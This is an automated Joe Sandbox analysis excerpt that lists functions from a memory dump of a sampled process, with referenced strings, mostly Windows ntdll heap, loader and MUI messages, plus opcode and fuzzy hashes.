                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                      • API String ID: 0-3063724069
                                                      • Opcode ID: 3195e0169bd19b96473f97c834d7a208434f720798352de6fd903ec1cf5d5166
                                                      • Instruction ID: ed6d2722ccf9140156398a8b58bebd7f354d333d9349eb2b66d3f1213a9a2394
                                                      • Opcode Fuzzy Hash: 3195e0169bd19b96473f97c834d7a208434f720798352de6fd903ec1cf5d5166
                                                      • Instruction Fuzzy Hash: 2AD1FFB390D315ABE721DA68C845BABB7E8AFC4714F044A29FE84E7250E774CD448793
                                                      Function 0580D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • @, xrefs: 0580D2AF
                                                      • @, xrefs: 0580D313
                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0580D146
                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0580D0CF
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0580D2C3
                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0580D196
                                                      • @, xrefs: 0580D0FD
                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0580D262
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                      • API String ID: 0-1356375266
                                                      • Opcode ID: b7e4058e4661a53f5743a75c290a2694476308731baa10637b2830591d33010b
                                                      • Instruction ID: b7ed381838e54800d4ac24d40415567e5b9bc85f0ec6861a7b48849b55cf438d
                                                      • Opcode Fuzzy Hash: b7e4058e4661a53f5743a75c290a2694476308731baa10637b2830591d33010b
                                                      • Instruction Fuzzy Hash: C6A14871A093059FD761DE64C844B6BBBE9BB84725F00492EE989D6280EB74DD08CB93
                                                      Function 0580F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-523794902
                                                      • Opcode ID: 764f676488d936f7baab124e13a8b6bbbf1ad993ebdca5acec4c952fb9a1d73f
                                                      • Instruction ID: 822c43ff6cde0f287a27f8f029749e7ecb28d20f7f116f2eec7ba5f593e84186
                                                      • Opcode Fuzzy Hash: 764f676488d936f7baab124e13a8b6bbbf1ad993ebdca5acec4c952fb9a1d73f
                                                      • Instruction Fuzzy Hash: 0D42DF753083859FC765DF28C888A2ABBE6BF88204F14996DED86CB391D734DC45CB52
                                                      Function 0582B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                      • API String ID: 0-122214566
                                                      • Opcode ID: 8da20b7a968f7c62da56b74872cccdd6916c5e8ec4ce5b9df7c8a286438f88de
                                                      • Instruction ID: a828d51c9a482df2f98cfc94ae189432957149e3a52085572c9a7b4e9889db62
                                                      • Opcode Fuzzy Hash: 8da20b7a968f7c62da56b74872cccdd6916c5e8ec4ce5b9df7c8a286438f88de
                                                      • Instruction Fuzzy Hash: BAC10571B05329ABCB28CB68C889B7E7BA6FF45315F144169EC02DB290DB70DD84C791
                                                      Function 058BF525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                      • API String ID: 0-1745908468
                                                      • Opcode ID: 472e1405cd5126de041866597e3fd6c88e4e82dfcdbf89f642004d17945777b0
                                                      • Instruction ID: 0c300a00831c1d9ef3a6373ebd6ac6a78240155a106b8ce7906efc5210f3f73c
                                                      • Opcode Fuzzy Hash: 472e1405cd5126de041866597e3fd6c88e4e82dfcdbf89f642004d17945777b0
                                                      • Instruction Fuzzy Hash: A291DA31A04284DFEB11DF68C845AEDBBF6BF09604F088059EE46DB3A1CBB59D81CB15
                                                      Function 0580645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • apphelp.dll, xrefs: 05806496
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05869A11, 05869A3A
                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05869A2A
                                                      • LdrpInitShimEngine, xrefs: 058699F4, 05869A07, 05869A30
                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058699ED
                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05869A01
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 7fd7903784a44a65950b63ce1c81a8cb9f1face6f90ab0640da4ec5892ac4b87
                                                      • Instruction ID: fe01590f230bc9c79b43b1e4e72c0adefd662133b38f9d3011ec28798599462b
                                                      • Opcode Fuzzy Hash: 7fd7903784a44a65950b63ce1c81a8cb9f1face6f90ab0640da4ec5892ac4b87
                                                      • Instruction Fuzzy Hash: E451AE753183049FD720DF24DC46A6B7BE9FB84644F041919FD86DB2A1EA30ED44DBA2
                                                      Function 0584C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Loading import redirection DLL: '%wZ', xrefs: 05888170
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 058881E5
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0584C6C3
                                                      • LdrpInitializeProcess, xrefs: 0584C6C4
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 05888181, 058881F5
                                                      • LdrpInitializeImportRedirection, xrefs: 05888177, 058881EB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: 415586a6e46c8f072cc4b58c0b30030b6301fd2dae058ba68cf81f2b1b143c7c
                                                      • Instruction ID: 9a76cbbfc74b57e9a04c26a57a1dcd847bf8c7ed687d0c9b889e6c8c990159ba
                                                      • Opcode Fuzzy Hash: 415586a6e46c8f072cc4b58c0b30030b6301fd2dae058ba68cf81f2b1b143c7c
                                                      • Instruction Fuzzy Hash: 5431A0B17593459FC314EB2CDD4AE2AB799EF84B10F044958FD45EB291EA20EC04DBA3
                                                      Function 05842674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 05882165
                                                      • RtlGetAssemblyStorageRoot, xrefs: 05882160, 0588219A, 058821BA
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05882178
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05882180
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 058821BF
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0588219F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: e4e3445ea39b8ed5e125b59224720442c081aea33c071759f82791ffb07ac8a0
                                                      • Instruction ID: 8e9744d6e4aad3f81561153fed35944e8932006bef778f04d8ad49d15186530b
                                                      • Opcode Fuzzy Hash: e4e3445ea39b8ed5e125b59224720442c081aea33c071759f82791ffb07ac8a0
                                                      • Instruction Fuzzy Hash: 0E31267EB042187BEB25EA988C45F6F7A79EF54A80F054059BF06E7240D270BE00DBA1
                                                      Function 0583F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 058802E7
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 058802BD
                                                      • RTL: Re-Waiting, xrefs: 0588031E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 763d9bdf45e3e21dc82ae59924cc592bf8bc5f9c43f1511c71c75decfbe57b8b
                                                      • Instruction ID: f7bf3200cceeb2ea6c3125bf903828e411e5806a537f6c2b09fab4bd180ce03f
                                                      • Opcode Fuzzy Hash: 763d9bdf45e3e21dc82ae59924cc592bf8bc5f9c43f1511c71c75decfbe57b8b
                                                      • Instruction Fuzzy Hash: 99E18F31A08745DFD725DF28C889B2AB7E1FB44324F140A69F996C72A1D778EC44CB82
                                                      Function 058351EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Kernel-MUI-Number-Allowed, xrefs: 05835247
                                                      • Kernel-MUI-Language-SKU, xrefs: 0583542B
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 05835352
                                                      • WindowsExcludedProcs, xrefs: 0583522A
                                                      • Kernel-MUI-Language-Allowed, xrefs: 0583527B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 7ed0ffd735873c18ad837739c87287e3715ee3cd58649b7a768429863f4328b3
                                                      • Instruction ID: fd74a0b780851a4cf5c670dea98508a8d2cf64100f0523d6ad7ac9a20c014eeb
                                                      • Opcode Fuzzy Hash: 7ed0ffd735873c18ad837739c87287e3715ee3cd58649b7a768429863f4328b3
                                                      • Instruction Fuzzy Hash: 4DF14E72E05228EFCB15DF98C9859EEBBBAFF48650F15405AE901E7210E7749E018BD0
                                                      Function 0583D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1975516107
                                                      • Opcode ID: 95b612f66a1803cec2d9ffd436620955e73c0097efeb85418bc6f12c87671bfd
                                                      • Instruction ID: ba0a72f7440ec76885e75777c0d75ed5effaf9bfc724b7a32037dce73b11689e
                                                      • Opcode Fuzzy Hash: 95b612f66a1803cec2d9ffd436620955e73c0097efeb85418bc6f12c87671bfd
                                                      • Instruction Fuzzy Hash: 2C51BF71A09349DFDB14DF68D48A7ADBFB2BB44358F144959DC02AB281DB74AC81CBC1
                                                      Function 058076B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                      • API String ID: 0-3061284088
                                                      • Opcode ID: 72851fd812c170d1c47327730d5dd37829f6da2b860f0bb06a121e644428f4c5
                                                      • Instruction ID: ce544285c89b12ba97bce89ac4c63cc35de1e74da2c12ac7e77481eeee0095fd
                                                      • Opcode Fuzzy Hash: 72851fd812c170d1c47327730d5dd37829f6da2b860f0bb06a121e644428f4c5
                                                      • Instruction Fuzzy Hash: 07014772398384DED329931CE80EF6A7BD4EF46A35F284019F805C7690DAB49C81E122
                                                      Function 058270C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                      • API String ID: 0-3178619729
                                                      • Opcode ID: 65f686b43cc9ac201db289884419f198da8816d3028654c902b6e7c4e48615ae
                                                      • Instruction ID: 2164a014cd58403619525d56714f4900890c997e69eed4212dfe8818a2547209
                                                      • Opcode Fuzzy Hash: 65f686b43cc9ac201db289884419f198da8816d3028654c902b6e7c4e48615ae
                                                      • Instruction Fuzzy Hash: 0C137B70A047699FDB24CF69C494BA9BBB2FF48304F148169D84AEB381D734AD85CF91
                                                      Function 05821070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-3570731704
                                                      • Opcode ID: ee9817cd76d764c74c8625b17418719c95f4104de93696ea330dba952f2a6d43
                                                      • Instruction ID: 9361b2984d61edc6cdb470fbaad547363c35b775915bc8b6c1487253c946dee9
                                                      • Opcode Fuzzy Hash: ee9817cd76d764c74c8625b17418719c95f4104de93696ea330dba952f2a6d43
                                                      • Instruction Fuzzy Hash: 35922A71A05269CFEB24CB18C889FA9BBB6BF45314F1581EAED49E7250D7309E80CF51
                                                      Function 0581A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: f9ae3fd3287ad46c2ac5930cd5f72f24fcc87da0d821fdefdc49b0cd2b7ce9a8
                                                      • Instruction ID: 81f8a1236977e183a1023757a4ee28ff7a96a4d62012064e5c153e1061d3c406
                                                      • Opcode Fuzzy Hash: f9ae3fd3287ad46c2ac5930cd5f72f24fcc87da0d821fdefdc49b0cd2b7ce9a8
                                                      • Instruction Fuzzy Hash: A9C16B7420938A8FC719CF58C144B6AB7E9BF84708F04496AFC96CB250E734CE45CB9A
                                                      Function 05848402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 05848421
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0584855E
                                                      • LdrpInitializeProcess, xrefs: 05848422
                                                      • @, xrefs: 05848591
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
                                                      • Opcode ID: 1179e2fb82deb11f00a0b71bb4b9377fcf440c14c890c265050c8db1bb9fdbe8
                                                      • Instruction ID: ced146182cdf2ed80bdf8029c22232db9c383c4938a3a7ebf1434b9b48dd3a7f
                                                      • Opcode Fuzzy Hash: 1179e2fb82deb11f00a0b71bb4b9377fcf440c14c890c265050c8db1bb9fdbe8
                                                      • Instruction Fuzzy Hash: FC916A71608348AFE721EB24C855EBBBAE9BB88654F40092EFE85D6150E734DD44CF63
                                                      Function 0584273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 058821D9, 058822B1
                                                      • SXS: %s() passed the empty activation context, xrefs: 058821DE
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 058822B6
                                                      • .Local, xrefs: 058428D8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: af0b5069b43e533bd9e7c0c8b49450d95c5e87ddacf399c7ac86965785600e0b
                                                      • Instruction ID: 1501824ea291e013359448271cd005e30bc20bdedfad72a75959ad50d2e81e15
                                                      • Opcode Fuzzy Hash: af0b5069b43e533bd9e7c0c8b49450d95c5e87ddacf399c7ac86965785600e0b
                                                      • Instruction Fuzzy Hash: 8FA18039A0422D9BCB24DF64D888BA9B7B1FF58314F5541E9EC0AE7251D7309E80CF91
                                                      Function 058164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0587106B
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 05871028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 058710AE
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 05870FE5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: eb04a36bbdaa658d2cab11cb81aa8fbf65069366a7b5f4a8a0742a6dffecea02
                                                      • Instruction ID: b2dc185de52c82bc014d3dfe7e9977bdb3f3a22a66105a7c4ca64d0d107c4163
                                                      • Opcode Fuzzy Hash: eb04a36bbdaa658d2cab11cb81aa8fbf65069366a7b5f4a8a0742a6dffecea02
                                                      • Instruction Fuzzy Hash: 167181B16043049FCB60DF19C889FA77BA9AF44764F440468FD89CA686E734D988CFD6
                                                      Function 0580F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                      • API String ID: 0-2586055223
                                                      • Opcode ID: 909c723436c0bc48173c15d5322adf926eae8bde62d54c0fe0010e7a9a33ba1a
                                                      • Instruction ID: a0e6378d36dc3da1c0827a9c7dadc4f56f5cd39e7db1d16d15118c104515ea0e
                                                      • Opcode Fuzzy Hash: 909c723436c0bc48173c15d5322adf926eae8bde62d54c0fe0010e7a9a33ba1a
                                                      • Instruction Fuzzy Hash: 4F61CE762047849FD721DA28CC58F6B7BEAFF80714F044869EE55CB291DA34DC45CB62
                                                      Function 058C11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                      • API String ID: 0-336120773
                                                      • Opcode ID: 9f2a775e627932166fb14ef89de0408d737b9c4b54e81d9fa6d398aac9d0f4b8
                                                      • Instruction ID: 796fb3168f4094662a14034b959bc4d9cd8fc282d21ab3b1c51fa2275cd30cc7
                                                      • Opcode Fuzzy Hash: 9f2a775e627932166fb14ef89de0408d737b9c4b54e81d9fa6d398aac9d0f4b8
                                                      • Instruction Fuzzy Hash: 1B31E075210204EFD710DB98C8C9F6A7BE9FF08665F140099FC07DB2A2E670EC40DA56
                                                      Function 0583245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0587A998
                                                      • apphelp.dll, xrefs: 05832462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0587A9A2
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0587A992
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: 9c3c420ba4c198963c1a29e38bf6f3998849eb37bd641946cca294d068e5fbe4
                                                      • Instruction ID: dac75e3decece1fd3c52eb34cd29ecc33a40a7bff436af12f214cb757155d528
                                                      • Opcode Fuzzy Hash: 9c3c420ba4c198963c1a29e38bf6f3998849eb37bd641946cca294d068e5fbe4
                                                      • Instruction Fuzzy Hash: D331C071714205AFDB289F6CD886E7EBBAAFB84B04F150859FD11E7240CBB09C91CB80
                                                      Function 05809148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                      • API String ID: 0-1391187441
                                                      • Opcode ID: d61307205b344b51fb94ea50e10cf4206d809cb7bbbb273de53fc5f8e5749077
                                                      • Instruction ID: 67c2bc2d46ae9fc18fe1b0930bdb4987d0962e164f855674dfffaffcc18ca432
                                                      • Opcode Fuzzy Hash: d61307205b344b51fb94ea50e10cf4206d809cb7bbbb273de53fc5f8e5749077
                                                      • Instruction Fuzzy Hash: 0C31CE76B01208AFCB41EB48CC88FAEB7BAEF44625F144061EC15EB291E774ED40CA61
                                                      Function 058B94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $0
                                                      • API String ID: 0-3352262554
                                                      • Opcode ID: 9bc38c7891d901fe59025b3a57bc806a60a0597ff086e8d9edba6f3e88bc8ddc
                                                      • Instruction ID: fdf18b1e1275d4a48ea3a234c92326a906478e4da0c66c2b7734d7dc88f55a84
                                                      • Opcode Fuzzy Hash: 9bc38c7891d901fe59025b3a57bc806a60a0597ff086e8d9edba6f3e88bc8ddc
